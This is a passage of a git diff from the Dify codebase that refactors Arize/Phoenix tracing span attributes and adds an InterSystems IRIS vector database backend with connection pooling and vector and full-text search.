attributes={ - SpanAttributes.INPUT_VALUE: json.dumps(trace_info.inputs, ensure_ascii=False), - SpanAttributes.OUTPUT_VALUE: json.dumps( + SpanAttributes.OPENINFERENCE_SPAN_KIND: OpenInferenceSpanKindValues.TOOL.value, + SpanAttributes.INPUT_VALUE: safe_json_dumps(trace_info.inputs), + SpanAttributes.INPUT_MIME_TYPE: OpenInferenceMimeTypeValues.JSON.value, + SpanAttributes.OUTPUT_VALUE: safe_json_dumps( { - "action": trace_info.action, "flagged": trace_info.flagged, + "action": trace_info.action, "preset_response": trace_info.preset_response, - "inputs": trace_info.inputs, - }, - 
ensure_ascii=False, + "query": trace_info.query, + } ), - SpanAttributes.OPENINFERENCE_SPAN_KIND: OpenInferenceSpanKindValues.CHAIN.value, - SpanAttributes.METADATA: json.dumps(metadata, ensure_ascii=False), + SpanAttributes.OUTPUT_MIME_TYPE: OpenInferenceMimeTypeValues.JSON.value, + SpanAttributes.METADATA: safe_json_dumps(metadata), }, start_time=datetime_to_nanos(trace_info.start_time), context=root_span_context, @@ -494,22 +539,28 @@ class ArizePhoenixDataTrace(BaseTraceInstance): def suggested_question_trace(self, trace_info: SuggestedQuestionTraceInfo): if trace_info.message_data is None: + logger.warning("[Arize/Phoenix] Message data is None, skipping suggested question trace.") return start_time = trace_info.start_time or trace_info.message_data.created_at end_time = trace_info.end_time or trace_info.message_data.updated_at - metadata = { - "message_id": trace_info.message_id, - "tool_name": "suggested_question", - "status": trace_info.status, - "status_message": trace_info.error or "", - "level": "ERROR" if trace_info.error else "DEFAULT", - "total_tokens": trace_info.total_tokens, - "ls_provider": trace_info.model_provider or "", - "ls_model_name": trace_info.model_id or "", - } - metadata.update(trace_info.metadata) + metadata = wrap_span_metadata( + trace_info.metadata, + trace_id=trace_info.trace_id or "", + message_id=trace_info.message_id or "", + status=trace_info.status or "", + status_message=trace_info.status_message or "", + level=trace_info.level or "", + trace_entity_type="suggested_question", + total_tokens=trace_info.total_tokens or 0, + from_account_id=trace_info.from_account_id or "", + agent_based=trace_info.agent_based or False, + from_source=trace_info.from_source or "", + model_provider=trace_info.model_provider or "", + model_id=trace_info.model_id or "", + workflow_run_id=trace_info.workflow_run_id or "", + ) dify_trace_id = trace_info.trace_id or trace_info.message_id self.ensure_root_span(dify_trace_id) @@ -518,10 +569,12 @@ class 
ArizePhoenixDataTrace(BaseTraceInstance): span = self.tracer.start_span( name=TraceTaskName.SUGGESTED_QUESTION_TRACE.value, attributes={ - SpanAttributes.INPUT_VALUE: json.dumps(trace_info.inputs, ensure_ascii=False), - SpanAttributes.OUTPUT_VALUE: json.dumps(trace_info.suggested_question, ensure_ascii=False), - SpanAttributes.OPENINFERENCE_SPAN_KIND: OpenInferenceSpanKindValues.CHAIN.value, - SpanAttributes.METADATA: json.dumps(metadata, ensure_ascii=False), + SpanAttributes.OPENINFERENCE_SPAN_KIND: OpenInferenceSpanKindValues.TOOL.value, + SpanAttributes.INPUT_VALUE: safe_json_dumps(trace_info.inputs), + SpanAttributes.INPUT_MIME_TYPE: OpenInferenceMimeTypeValues.JSON.value, + SpanAttributes.OUTPUT_VALUE: safe_json_dumps(trace_info.suggested_question), + SpanAttributes.OUTPUT_MIME_TYPE: OpenInferenceMimeTypeValues.JSON.value, + SpanAttributes.METADATA: safe_json_dumps(metadata), }, start_time=datetime_to_nanos(start_time), context=root_span_context, @@ -537,21 +590,23 @@ class ArizePhoenixDataTrace(BaseTraceInstance): def dataset_retrieval_trace(self, trace_info: DatasetRetrievalTraceInfo): if trace_info.message_data is None: + logger.warning("[Arize/Phoenix] Message data is None, skipping dataset retrieval trace.") return start_time = trace_info.start_time or trace_info.message_data.created_at end_time = trace_info.end_time or trace_info.message_data.updated_at - metadata = { - "message_id": trace_info.message_id, - "tool_name": "dataset_retrieval", - "status": trace_info.message_data.status, - "status_message": trace_info.message_data.error or "", - "level": "ERROR" if trace_info.message_data.error else "DEFAULT", - "ls_provider": trace_info.message_data.model_provider or "", - "ls_model_name": trace_info.message_data.model_id or "", - } - metadata.update(trace_info.metadata) + metadata = wrap_span_metadata( + trace_info.metadata, + trace_id=trace_info.trace_id or "", + message_id=trace_info.message_id or "", + status=trace_info.message_data.status or "", + 
status_message=trace_info.error or "", + level="ERROR" if trace_info.error else "DEFAULT", + trace_entity_type="dataset_retrieval", + model_provider=trace_info.message_data.model_provider or "", + model_id=trace_info.message_data.model_id or "", + ) dify_trace_id = trace_info.trace_id or trace_info.message_id self.ensure_root_span(dify_trace_id) @@ -560,20 +615,20 @@ class ArizePhoenixDataTrace(BaseTraceInstance): span = self.tracer.start_span( name=TraceTaskName.DATASET_RETRIEVAL_TRACE.value, attributes={ - SpanAttributes.INPUT_VALUE: json.dumps(trace_info.inputs, ensure_ascii=False), - SpanAttributes.OUTPUT_VALUE: json.dumps({"documents": trace_info.documents}, ensure_ascii=False), SpanAttributes.OPENINFERENCE_SPAN_KIND: OpenInferenceSpanKindValues.RETRIEVER.value, - SpanAttributes.METADATA: json.dumps(metadata, ensure_ascii=False), - "start_time": start_time.isoformat() if start_time else "", - "end_time": end_time.isoformat() if end_time else "", + SpanAttributes.INPUT_VALUE: safe_json_dumps(trace_info.inputs), + SpanAttributes.INPUT_MIME_TYPE: OpenInferenceMimeTypeValues.JSON.value, + SpanAttributes.OUTPUT_VALUE: safe_json_dumps({"documents": trace_info.documents}), + SpanAttributes.OUTPUT_MIME_TYPE: OpenInferenceMimeTypeValues.JSON.value, + SpanAttributes.METADATA: safe_json_dumps(metadata), }, start_time=datetime_to_nanos(start_time), context=root_span_context, ) try: - if trace_info.message_data.error: - set_span_status(span, trace_info.message_data.error) + if trace_info.error: + set_span_status(span, trace_info.error) else: set_span_status(span) finally: @@ -584,30 +639,34 @@ class ArizePhoenixDataTrace(BaseTraceInstance): logger.warning("[Arize/Phoenix] Message data is None, skipping tool trace.") return - metadata = { - "message_id": trace_info.message_id, - "tool_config": json.dumps(trace_info.tool_config, ensure_ascii=False), - } + metadata = wrap_span_metadata( + trace_info.metadata, + trace_id=trace_info.trace_id or "", + 
message_id=trace_info.message_id or "", + status=trace_info.message_data.status or "", + status_message=trace_info.error or "", + level="ERROR" if trace_info.error else "DEFAULT", + trace_entity_type="tool", + tool_config=safe_json_dumps(trace_info.tool_config), + time_cost=trace_info.time_cost or 0, + file_url=trace_info.file_url or "", + ) dify_trace_id = trace_info.trace_id or trace_info.message_id self.ensure_root_span(dify_trace_id) root_span_context = self.propagator.extract(carrier=self.carrier) - tool_params_str = ( - json.dumps(trace_info.tool_parameters, ensure_ascii=False) - if isinstance(trace_info.tool_parameters, dict) - else str(trace_info.tool_parameters) - ) - span = self.tracer.start_span( name=trace_info.tool_name, attributes={ - SpanAttributes.INPUT_VALUE: json.dumps(trace_info.tool_inputs, ensure_ascii=False), - SpanAttributes.OUTPUT_VALUE: trace_info.tool_outputs, SpanAttributes.OPENINFERENCE_SPAN_KIND: OpenInferenceSpanKindValues.TOOL.value, - SpanAttributes.METADATA: json.dumps(metadata, ensure_ascii=False), + SpanAttributes.INPUT_VALUE: safe_json_dumps(trace_info.tool_inputs), + SpanAttributes.INPUT_MIME_TYPE: OpenInferenceMimeTypeValues.JSON.value, + SpanAttributes.OUTPUT_VALUE: trace_info.tool_outputs, + SpanAttributes.OUTPUT_MIME_TYPE: OpenInferenceMimeTypeValues.TEXT.value, + SpanAttributes.METADATA: safe_json_dumps(metadata), SpanAttributes.TOOL_NAME: trace_info.tool_name, - SpanAttributes.TOOL_PARAMETERS: tool_params_str, + SpanAttributes.TOOL_PARAMETERS: safe_json_dumps(trace_info.tool_parameters), }, start_time=datetime_to_nanos(trace_info.start_time), context=root_span_context, @@ -623,16 +682,22 @@ class ArizePhoenixDataTrace(BaseTraceInstance): def generate_name_trace(self, trace_info: GenerateNameTraceInfo): if trace_info.message_data is None: + logger.warning("[Arize/Phoenix] Message data is None, skipping generate name trace.") return - metadata = { - "project_name": self.project, - "message_id": trace_info.message_id, - 
"status": trace_info.message_data.status, - "status_message": trace_info.message_data.error or "", - "level": "ERROR" if trace_info.message_data.error else "DEFAULT", - } - metadata.update(trace_info.metadata) + metadata = wrap_span_metadata( + trace_info.metadata, + trace_id=trace_info.trace_id or "", + message_id=trace_info.message_id or "", + status=trace_info.message_data.status or "", + status_message=trace_info.message_data.error or "", + level="ERROR" if trace_info.message_data.error else "DEFAULT", + trace_entity_type="generate_name", + model_provider=trace_info.message_data.model_provider or "", + model_id=trace_info.message_data.model_id or "", + conversation_id=trace_info.conversation_id or "", + tenant_id=trace_info.tenant_id, + ) dify_trace_id = trace_info.trace_id or trace_info.message_id or trace_info.conversation_id self.ensure_root_span(dify_trace_id) @@ -641,13 +706,13 @@ class ArizePhoenixDataTrace(BaseTraceInstance): span = self.tracer.start_span( name=TraceTaskName.GENERATE_NAME_TRACE.value, attributes={ - SpanAttributes.INPUT_VALUE: json.dumps(trace_info.inputs, ensure_ascii=False), - SpanAttributes.OUTPUT_VALUE: json.dumps(trace_info.outputs, ensure_ascii=False), SpanAttributes.OPENINFERENCE_SPAN_KIND: OpenInferenceSpanKindValues.CHAIN.value, - SpanAttributes.METADATA: json.dumps(metadata, ensure_ascii=False), - SpanAttributes.SESSION_ID: trace_info.message_data.conversation_id, - "start_time": trace_info.start_time.isoformat() if trace_info.start_time else "", - "end_time": trace_info.end_time.isoformat() if trace_info.end_time else "", + SpanAttributes.INPUT_VALUE: safe_json_dumps(trace_info.inputs), + SpanAttributes.INPUT_MIME_TYPE: OpenInferenceMimeTypeValues.JSON.value, + SpanAttributes.OUTPUT_VALUE: safe_json_dumps(trace_info.outputs), + SpanAttributes.OUTPUT_MIME_TYPE: OpenInferenceMimeTypeValues.JSON.value, + SpanAttributes.METADATA: safe_json_dumps(metadata), + SpanAttributes.SESSION_ID: trace_info.conversation_id or "", }, 
start_time=datetime_to_nanos(trace_info.start_time), context=root_span_context, @@ -688,32 +753,85 @@ class ArizePhoenixDataTrace(BaseTraceInstance): raise ValueError(f"[Arize/Phoenix] API check failed: {str(e)}") def get_project_url(self): + """Build a redirect URL that forwards the user to the correct project for Arize/Phoenix.""" try: - if self.arize_phoenix_config.endpoint == "https://otlp.arize.com": - return "https://app.arize.com/" - else: - return f"{self.arize_phoenix_config.endpoint}/projects/" + project_name = self.arize_phoenix_config.project + endpoint = self.arize_phoenix_config.endpoint.rstrip("/") + + # Arize + if isinstance(self.arize_phoenix_config, ArizeConfig): + return f"https://app.arize.com/?redirect_project_name={project_name}" + + # Phoenix + return f"{endpoint}/projects/?redirect_project_name={project_name}" + except Exception as e: - logger.info("[Arize/Phoenix] Get run url failed: %s", str(e), exc_info=True) - raise ValueError(f"[Arize/Phoenix] Get run url failed: {str(e)}") + logger.info("[Arize/Phoenix] Failed to construct project URL: %s", str(e), exc_info=True) + raise ValueError(f"[Arize/Phoenix] Failed to construct project URL: {str(e)}") def _construct_llm_attributes(self, prompts: dict | list | str | None) -> dict[str, str]: - """Helper method to construct LLM attributes with passed prompts.""" - attributes = {} + """Construct LLM attributes with passed prompts for Arize/Phoenix.""" + attributes: dict[str, str] = {} + + def set_attribute(path: str, value: object) -> None: + """Store an attribute safely as a string.""" + if value is None: + return + try: + if isinstance(value, (dict, list)): + value = safe_json_dumps(value) + attributes[path] = str(value) + except Exception: + attributes[path] = str(value) + + def set_message_attribute(message_index: int, key: str, value: object) -> None: + path = f"{SpanAttributes.LLM_INPUT_MESSAGES}.{message_index}.{key}" + set_attribute(path, value) + + def 
set_tool_call_attributes(message_index: int, tool_index: int, tool_call: dict | object | None) -> None: + """Extract and assign tool call details safely.""" + if not tool_call: + return + + def safe_get(obj, key, default=None): + if isinstance(obj, dict): + return obj.get(key, default) + return getattr(obj, key, default) + + function_obj = safe_get(tool_call, "function", {}) + function_name = safe_get(function_obj, "name", "") + function_args = safe_get(function_obj, "arguments", {}) + call_id = safe_get(tool_call, "id", "") + + base_path = ( + f"{SpanAttributes.LLM_INPUT_MESSAGES}." + f"{message_index}.{MessageAttributes.MESSAGE_TOOL_CALLS}.{tool_index}" + ) + + set_attribute(f"{base_path}.{ToolCallAttributes.TOOL_CALL_FUNCTION_NAME}", function_name) + set_attribute(f"{base_path}.{ToolCallAttributes.TOOL_CALL_FUNCTION_ARGUMENTS_JSON}", function_args) + set_attribute(f"{base_path}.{ToolCallAttributes.TOOL_CALL_ID}", call_id) + + # Handle list of messages if isinstance(prompts, list): - for i, msg in enumerate(prompts): - if isinstance(msg, dict): - attributes[f"{SpanAttributes.LLM_INPUT_MESSAGES}.{i}.message.content"] = msg.get("text", "") - attributes[f"{SpanAttributes.LLM_INPUT_MESSAGES}.{i}.message.role"] = msg.get("role", "user") - # todo: handle assistant and tool role messages, as they don't always - # have a text field, but may have a tool_calls field instead - # e.g. 
'tool_calls': [{'id': '98af3a29-b066-45a5-b4b1-46c74ddafc58', - # 'type': 'function', 'function': {'name': 'current_time', 'arguments': '{}'}}]} - elif isinstance(prompts, dict): - attributes[f"{SpanAttributes.LLM_INPUT_MESSAGES}.0.message.content"] = json.dumps(prompts) - attributes[f"{SpanAttributes.LLM_INPUT_MESSAGES}.0.message.role"] = "user" - elif isinstance(prompts, str): - attributes[f"{SpanAttributes.LLM_INPUT_MESSAGES}.0.message.content"] = prompts - attributes[f"{SpanAttributes.LLM_INPUT_MESSAGES}.0.message.role"] = "user" + for message_index, message in enumerate(prompts): + if not isinstance(message, dict): + continue + + role = message.get("role", "user") + content = message.get("text") or message.get("content") or "" + + set_message_attribute(message_index, MessageAttributes.MESSAGE_ROLE, role) + set_message_attribute(message_index, MessageAttributes.MESSAGE_CONTENT, content) + + tool_calls = message.get("tool_calls") or [] + if isinstance(tool_calls, list): + for tool_index, tool_call in enumerate(tool_calls): + set_tool_call_attributes(message_index, tool_index, tool_call) + + # Handle single dict or plain string prompt + elif isinstance(prompts, (dict, str)): + set_message_attribute(0, MessageAttributes.MESSAGE_CONTENT, prompts) + set_message_attribute(0, MessageAttributes.MESSAGE_ROLE, "user") return attributes diff --git a/api/core/plugin/impl/base.py b/api/core/plugin/impl/base.py index a1c84bd5d9..7bb2749afa 100644 --- a/api/core/plugin/impl/base.py +++ b/api/core/plugin/impl/base.py @@ -39,7 +39,7 @@ from core.trigger.errors import ( plugin_daemon_inner_api_baseurl = URL(str(dify_config.PLUGIN_DAEMON_URL)) _plugin_daemon_timeout_config = cast( float | httpx.Timeout | None, - getattr(dify_config, "PLUGIN_DAEMON_TIMEOUT", 300.0), + getattr(dify_config, "PLUGIN_DAEMON_TIMEOUT", 600.0), ) plugin_daemon_request_timeout: httpx.Timeout | None if _plugin_daemon_timeout_config is None: diff --git a/api/core/rag/datasource/vdb/iris/__init__.py 
b/api/core/rag/datasource/vdb/iris/__init__.py new file mode 100644 index 0000000000..e69de29bb2 diff --git a/api/core/rag/datasource/vdb/iris/iris_vector.py b/api/core/rag/datasource/vdb/iris/iris_vector.py new file mode 100644 index 0000000000..b1bfabb76e --- /dev/null +++ b/api/core/rag/datasource/vdb/iris/iris_vector.py @@ -0,0 +1,407 @@ +"""InterSystems IRIS vector database implementation for Dify. + +This module provides vector storage and retrieval using IRIS native VECTOR type +with HNSW indexing for efficient similarity search. +""" + +from __future__ import annotations + +import json +import logging +import threading +import uuid +from contextlib import contextmanager +from typing import TYPE_CHECKING, Any + +from configs import dify_config +from configs.middleware.vdb.iris_config import IrisVectorConfig +from core.rag.datasource.vdb.vector_base import BaseVector +from core.rag.datasource.vdb.vector_factory import AbstractVectorFactory +from core.rag.datasource.vdb.vector_type import VectorType +from core.rag.embedding.embedding_base import Embeddings +from core.rag.models.document import Document +from extensions.ext_redis import redis_client +from models.dataset import Dataset + +if TYPE_CHECKING: + import iris +else: + try: + import iris + except ImportError: + iris = None # type: ignore[assignment] + +logger = logging.getLogger(__name__) + +# Singleton connection pool to minimize IRIS license usage +_pool_lock = threading.Lock() +_pool_instance: IrisConnectionPool | None = None + + +def get_iris_pool(config: IrisVectorConfig) -> IrisConnectionPool: + """Get or create the global IRIS connection pool (singleton pattern).""" + global _pool_instance # pylint: disable=global-statement + with _pool_lock: + if _pool_instance is None: + logger.info("Initializing IRIS connection pool") + _pool_instance = IrisConnectionPool(config) + return _pool_instance + + +class IrisConnectionPool: + """Thread-safe connection pool for IRIS database.""" + + def 
__init__(self, config: IrisVectorConfig) -> None: + self.config = config + self._pool: list[Any] = [] + self._lock = threading.Lock() + self._min_size = config.IRIS_MIN_CONNECTION + self._max_size = config.IRIS_MAX_CONNECTION + self._in_use = 0 + self._schemas_initialized: set[str] = set() # Cache for initialized schemas + self._initialize_pool() + + def _initialize_pool(self) -> None: + for _ in range(self._min_size): + self._pool.append(self._create_connection()) + + def _create_connection(self) -> Any: + return iris.connect( + hostname=self.config.IRIS_HOST, + port=self.config.IRIS_SUPER_SERVER_PORT, + namespace=self.config.IRIS_DATABASE, + username=self.config.IRIS_USER, + password=self.config.IRIS_PASSWORD, + ) + + def get_connection(self) -> Any: + """Get a connection from pool or create new if available.""" + with self._lock: + if self._pool: + conn = self._pool.pop() + self._in_use += 1 + return conn + if self._in_use < self._max_size: + conn = self._create_connection() + self._in_use += 1 + return conn + raise RuntimeError("Connection pool exhausted") + + def return_connection(self, conn: Any) -> None: + """Return connection to pool after validating it.""" + if not conn: + return + + # Validate connection health + is_valid = False + try: + cursor = conn.cursor() + cursor.execute("SELECT 1") + cursor.close() + is_valid = True + except (OSError, RuntimeError) as e: + logger.debug("Connection validation failed: %s", e) + try: + conn.close() + except (OSError, RuntimeError): + pass + + with self._lock: + self._pool.append(conn if is_valid else self._create_connection()) + self._in_use -= 1 + + def ensure_schema_exists(self, schema: str) -> None: + """Ensure schema exists in IRIS database. + + This method is idempotent and thread-safe. It uses a memory cache to avoid + redundant database queries for already-verified schemas. 
+ + Args: + schema: Schema name to ensure exists + + Raises: + Exception: If schema creation fails + """ + # Fast path: check cache first (no lock needed for read-only set lookup) + if schema in self._schemas_initialized: + return + + # Slow path: acquire lock and check again (double-checked locking) + with self._lock: + if schema in self._schemas_initialized: + return + + # Get a connection to check/create schema + conn = self._pool[0] if self._pool else self._create_connection() + cursor = conn.cursor() + try: + # Check if schema exists using INFORMATION_SCHEMA + check_sql = """ + SELECT COUNT(*) FROM INFORMATION_SCHEMA.SCHEMATA + WHERE SCHEMA_NAME = ? + """ + cursor.execute(check_sql, (schema,)) # Must be tuple or list + exists = cursor.fetchone()[0] > 0 + + if not exists: + # Schema doesn't exist, create it + cursor.execute(f"CREATE SCHEMA {schema}") + conn.commit() + logger.info("Created schema: %s", schema) + else: + logger.debug("Schema already exists: %s", schema) + + # Add to cache to skip future checks + self._schemas_initialized.add(schema) + + except Exception as e: + conn.rollback() + logger.exception("Failed to ensure schema %s exists", schema) + raise + finally: + cursor.close() + + def close_all(self) -> None: + """Close all connections (application shutdown only).""" + with self._lock: + for conn in self._pool: + try: + conn.close() + except (OSError, RuntimeError): + pass + self._pool.clear() + self._in_use = 0 + self._schemas_initialized.clear() + + +class IrisVector(BaseVector): + """IRIS vector database implementation using native VECTOR type and HNSW indexing.""" + + def __init__(self, collection_name: str, config: IrisVectorConfig) -> None: + super().__init__(collection_name) + self.config = config + self.table_name = f"embedding_{collection_name}".upper() + self.schema = config.IRIS_SCHEMA or "dify" + self.pool = get_iris_pool(config) + + def get_type(self) -> str: + return VectorType.IRIS + + @contextmanager + def _get_cursor(self): + 
"""Context manager for database cursor with connection pooling.""" + conn = self.pool.get_connection() + cursor = conn.cursor() + try: + yield cursor + conn.commit() + except Exception: + conn.rollback() + raise + finally: + cursor.close() + self.pool.return_connection(conn) + + def create(self, texts: list[Document], embeddings: list[list[float]], **kwargs) -> list[str]: + dimension = len(embeddings[0]) + self._create_collection(dimension) + return self.add_texts(texts, embeddings) + + def add_texts(self, documents: list[Document], embeddings: list[list[float]], **_kwargs) -> list[str]: + """Add documents with embeddings to the collection.""" + added_ids = [] + with self._get_cursor() as cursor: + for i, doc in enumerate(documents): + doc_id = doc.metadata.get("doc_id", str(uuid.uuid4())) if doc.metadata else str(uuid.uuid4()) + metadata = json.dumps(doc.metadata) if doc.metadata else "{}" + embedding_str = json.dumps(embeddings[i]) + + sql = f"INSERT INTO {self.schema}.{self.table_name} (id, text, meta, embedding) VALUES (?, ?, ?, ?)" + cursor.execute(sql, (doc_id, doc.page_content, metadata, embedding_str)) + added_ids.append(doc_id) + + return added_ids + + def text_exists(self, id: str) -> bool: # pylint: disable=redefined-builtin + try: + with self._get_cursor() as cursor: + sql = f"SELECT 1 FROM {self.schema}.{self.table_name} WHERE id = ?" + cursor.execute(sql, (id,)) + return cursor.fetchone() is not None + except (OSError, RuntimeError, ValueError): + return False + + def delete_by_ids(self, ids: list[str]) -> None: + if not ids: + return + + with self._get_cursor() as cursor: + placeholders = ",".join(["?" 
for _ in ids]) + sql = f"DELETE FROM {self.schema}.{self.table_name} WHERE id IN ({placeholders})" + cursor.execute(sql, ids) + + def delete_by_metadata_field(self, key: str, value: str) -> None: + """Delete documents by metadata field (JSON LIKE pattern matching).""" + with self._get_cursor() as cursor: + pattern = f'%"{key}": "{value}"%' + sql = f"DELETE FROM {self.schema}.{self.table_name} WHERE meta LIKE ?" + cursor.execute(sql, (pattern,)) + + def search_by_vector(self, query_vector: list[float], **kwargs: Any) -> list[Document]: + """Search similar documents using VECTOR_COSINE with HNSW index.""" + top_k = kwargs.get("top_k", 4) + score_threshold = float(kwargs.get("score_threshold") or 0.0) + embedding_str = json.dumps(query_vector) + + with self._get_cursor() as cursor: + sql = f""" + SELECT TOP {top_k} id, text, meta, VECTOR_COSINE(embedding, ?) as score + FROM {self.schema}.{self.table_name} + ORDER BY score DESC + """ + cursor.execute(sql, (embedding_str,)) + + docs = [] + for row in cursor.fetchall(): + if len(row) >= 4: + text, meta_str, score = row[1], row[2], float(row[3]) + if score >= score_threshold: + metadata = json.loads(meta_str) if meta_str else {} + metadata["score"] = score + docs.append(Document(page_content=text, metadata=metadata)) + return docs + + def search_by_full_text(self, query: str, **kwargs: Any) -> list[Document]: + """Search documents by full-text using iFind index or fallback to LIKE search.""" + top_k = kwargs.get("top_k", 5) + + with self._get_cursor() as cursor: + if self.config.IRIS_TEXT_INDEX: + # Use iFind full-text search with index + text_index_name = f"idx_{self.table_name}_text" + sql = f""" + SELECT TOP {top_k} id, text, meta + FROM {self.schema}.{self.table_name} + WHERE %ID %FIND search_index({text_index_name}, ?) 
+ """ + cursor.execute(sql, (query,)) + else: + # Fallback to LIKE search (inefficient for large datasets) + query_pattern = f"%{query}%" + sql = f""" + SELECT TOP {top_k} id, text, meta + FROM {self.schema}.{self.table_name} + WHERE text LIKE ? + """ + cursor.execute(sql, (query_pattern,)) + + docs = [] + for row in cursor.fetchall(): + if len(row) >= 3: + metadata = json.loads(row[2]) if row[2] else {} + docs.append(Document(page_content=row[1], metadata=metadata)) + + if not docs: + logger.info("Full-text search for '%s' returned no results", query) + + return docs + + def delete(self) -> None: + """Delete the entire collection (drop table - permanent).""" + with self._get_cursor() as cursor: + sql = f"DROP TABLE {self.schema}.{self.table_name}" + cursor.execute(sql) + + def _create_collection(self, dimension: int) -> None: + """Create table with VECTOR column and HNSW index. + + Uses Redis lock to prevent concurrent creation attempts across multiple + API server instances (api, worker, worker_beat). 
+ """ + cache_key = f"vector_indexing_{self._collection_name}" + lock_name = f"{cache_key}_lock" + + with redis_client.lock(lock_name, timeout=20): # pylint: disable=not-context-manager + if redis_client.get(cache_key): + return + + # Ensure schema exists (idempotent, cached after first call) + self.pool.ensure_schema_exists(self.schema) + + with self._get_cursor() as cursor: + # Create table with VECTOR column + sql = f""" + CREATE TABLE {self.schema}.{self.table_name} ( + id VARCHAR(255) PRIMARY KEY, + text CLOB, + meta CLOB, + embedding VECTOR(DOUBLE, {dimension}) + ) + """ + logger.info("Creating table: %s.%s", self.schema, self.table_name) + cursor.execute(sql) + + # Create HNSW index for vector similarity search + index_name = f"idx_{self.table_name}_embedding" + sql_index = ( + f"CREATE INDEX {index_name} ON {self.schema}.{self.table_name} " + "(embedding) AS HNSW(Distance='Cosine')" + ) + logger.info("Creating HNSW index: %s", index_name) + cursor.execute(sql_index) + logger.info("HNSW index created successfully: %s", index_name) + + # Create full-text search index if enabled + logger.info( + "IRIS_TEXT_INDEX config value: %s (type: %s)", + self.config.IRIS_TEXT_INDEX, + type(self.config.IRIS_TEXT_INDEX), + ) + if self.config.IRIS_TEXT_INDEX: + text_index_name = f"idx_{self.table_name}_text" + language = self.config.IRIS_TEXT_INDEX_LANGUAGE + # Fixed: Removed extra parentheses and corrected syntax + sql_text_index = f""" + CREATE INDEX {text_index_name} ON {self.schema}.{self.table_name} (text) + AS %iFind.Index.Basic + (LANGUAGE = '{language}', LOWER = 1, INDEXOPTION = 0) + """ + logger.info("Creating text index: %s with language: %s", text_index_name, language) + logger.info("SQL for text index: %s", sql_text_index) + cursor.execute(sql_text_index) + logger.info("Text index created successfully: %s", text_index_name) + else: + logger.warning("Text index creation skipped - IRIS_TEXT_INDEX is disabled") + + redis_client.set(cache_key, 1, ex=3600) + + +class 
IrisVectorFactory(AbstractVectorFactory): + """Factory for creating IrisVector instances.""" + + def init_vector(self, dataset: Dataset, attributes: list, embeddings: Embeddings) -> IrisVector: + if dataset.index_struct_dict: + class_prefix: str = dataset.index_struct_dict["vector_store"]["class_prefix"] + collection_name = class_prefix + else: + dataset_id = dataset.id + collection_name = Dataset.gen_collection_name_by_id(dataset_id) + index_struct_dict = self.gen_index_struct_dict(VectorType.IRIS, collection_name) + dataset.index_struct = json.dumps(index_struct_dict) + + return IrisVector( + collection_name=collection_name, + config=IrisVectorConfig( + IRIS_HOST=dify_config.IRIS_HOST, + IRIS_SUPER_SERVER_PORT=dify_config.IRIS_SUPER_SERVER_PORT, + IRIS_USER=dify_config.IRIS_USER, + IRIS_PASSWORD=dify_config.IRIS_PASSWORD, + IRIS_DATABASE=dify_config.IRIS_DATABASE, + IRIS_SCHEMA=dify_config.IRIS_SCHEMA, + IRIS_CONNECTION_URL=dify_config.IRIS_CONNECTION_URL, + IRIS_MIN_CONNECTION=dify_config.IRIS_MIN_CONNECTION, + IRIS_MAX_CONNECTION=dify_config.IRIS_MAX_CONNECTION, + IRIS_TEXT_INDEX=dify_config.IRIS_TEXT_INDEX, + IRIS_TEXT_INDEX_LANGUAGE=dify_config.IRIS_TEXT_INDEX_LANGUAGE, + ), + ) diff --git a/api/core/rag/datasource/vdb/vector_factory.py b/api/core/rag/datasource/vdb/vector_factory.py index 3a47241293..b9772b3c08 100644 --- a/api/core/rag/datasource/vdb/vector_factory.py +++ b/api/core/rag/datasource/vdb/vector_factory.py @@ -163,7 +163,7 @@ class Vector: from core.rag.datasource.vdb.lindorm.lindorm_vector import LindormVectorStoreFactory return LindormVectorStoreFactory - case VectorType.OCEANBASE: + case VectorType.OCEANBASE | VectorType.SEEKDB: from core.rag.datasource.vdb.oceanbase.oceanbase_vector import OceanBaseVectorFactory return OceanBaseVectorFactory @@ -187,6 +187,10 @@ class Vector: from core.rag.datasource.vdb.clickzetta.clickzetta_vector import ClickzettaVectorFactory return ClickzettaVectorFactory + case VectorType.IRIS: + from 
core.rag.datasource.vdb.iris.iris_vector import IrisVectorFactory + + return IrisVectorFactory case _: raise ValueError(f"Vector store {vector_type} is not supported.") diff --git a/api/core/rag/datasource/vdb/vector_type.py b/api/core/rag/datasource/vdb/vector_type.py index bc7d93a2e0..bd99a31446 100644 --- a/api/core/rag/datasource/vdb/vector_type.py +++ b/api/core/rag/datasource/vdb/vector_type.py @@ -27,8 +27,10 @@ class VectorType(StrEnum): UPSTASH = "upstash" TIDB_ON_QDRANT = "tidb_on_qdrant" OCEANBASE = "oceanbase" + SEEKDB = "seekdb" OPENGAUSS = "opengauss" TABLESTORE = "tablestore" HUAWEI_CLOUD = "huawei_cloud" MATRIXONE = "matrixone" CLICKZETTA = "clickzetta" + IRIS = "iris" diff --git a/api/core/rag/extractor/entity/extract_setting.py b/api/core/rag/extractor/entity/extract_setting.py index c3bfbce98f..0c42034073 100644 --- a/api/core/rag/extractor/entity/extract_setting.py +++ b/api/core/rag/extractor/entity/extract_setting.py @@ -10,7 +10,7 @@ class NotionInfo(BaseModel): """ credential_id: str | None = None - notion_workspace_id: str + notion_workspace_id: str | None = "" notion_obj_id: str notion_page_type: str document: Document | None = None diff --git a/api/core/rag/extractor/excel_extractor.py b/api/core/rag/extractor/excel_extractor.py index ea9c6bd73a..875bfd1439 100644 --- a/api/core/rag/extractor/excel_extractor.py +++ b/api/core/rag/extractor/excel_extractor.py @@ -1,7 +1,7 @@ """Abstract interface for document loader implementations.""" import os -from typing import cast +from typing import TypedDict import pandas as pd from openpyxl import load_workbook @@ -10,6 +10,12 @@ from core.rag.extractor.extractor_base import BaseExtractor from core.rag.models.document import Document +class Candidate(TypedDict): + idx: int + count: int + map: dict[int, str] + + class ExcelExtractor(BaseExtractor): """Load Excel files. 
